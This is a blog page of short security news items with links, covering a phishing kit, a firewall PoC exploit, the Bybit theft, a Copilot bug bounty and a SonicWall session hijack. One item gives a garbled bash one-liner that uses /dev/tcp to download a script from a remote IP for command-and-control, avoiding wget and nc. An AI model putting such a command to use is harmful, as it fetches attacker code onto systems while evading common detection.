All posts by John Doe

■■□□□ Apiiro unveils free scanner to detect malicious code merges. https://www.bleepingcomputer.com/news/security/apiiro-unveils-free-scanner-to-detect-malicious-code-merges/

■■■□□ Cybercriminals Can Now Clone Any Brand’s Site in Minutes Using Darcula PhaaS v3. https://thehackernews.com/2025/02/cybercriminals-can-now-clone-any-brands.html

■■■■□ Google Released PoC Exploit For Palo Alto Firewall Command Injection Vulnerability. Google Released PoC Exploit For Palo Alto Firewall Command Injection Vulnerability

5️⃣ 1 liner bash for C2 without using any native program like wget, nc etc, esp containers. bash-c “exec 3/dev/tcp/IP/80; echo -e GET/ youfile.sh HTTP/1.1\r\nHost; ip\r\nConnection: close\r\n\r\n’ >&3; cat yourfile.sh’ Source: Linkedin | Harvey Spec

■■□□□ Introduction to the IoT/Embedded Linux: The OpenWRT Project. https://www.hackers-arise.com/post/introduction-to-the-iot-embedded-linux-the-openwrt-project

■■■□□ User Email Disclosure via ID-Based Invitation. https://hackerone.com/reports/3003716

■■■■□ Unconfirmed: North Korea’s Lazarus Group stole $1.4 billion from Bybit.

■■■□□ Microsoft expands Copilot bug bounty targets, payouts. https://www.theregister.com/2025/02/20/microsoft_copilot_bug_bounty_updated/ https://msrc.microsoft.com/blog/2025/02/exciting-updates-to-the-copilot-ai-bounty-program-enhancing-security-and-incentivizing-innovation/

■■■□□ Bybit cryptocurrency exchange experienced a loss of approximately $1,400,000,000 today, primarily in ETH. The perpetrator employed sophisticated transaction chains to obfuscate the movement of funds and hinder traceability.

■■■■□ SonicWall CVE-2024-53704: SSL VPN Session Hijacking. https://bishopfox.com/blog/sonicwall-cve-2024-53704-ssl-vpn-session-hijacking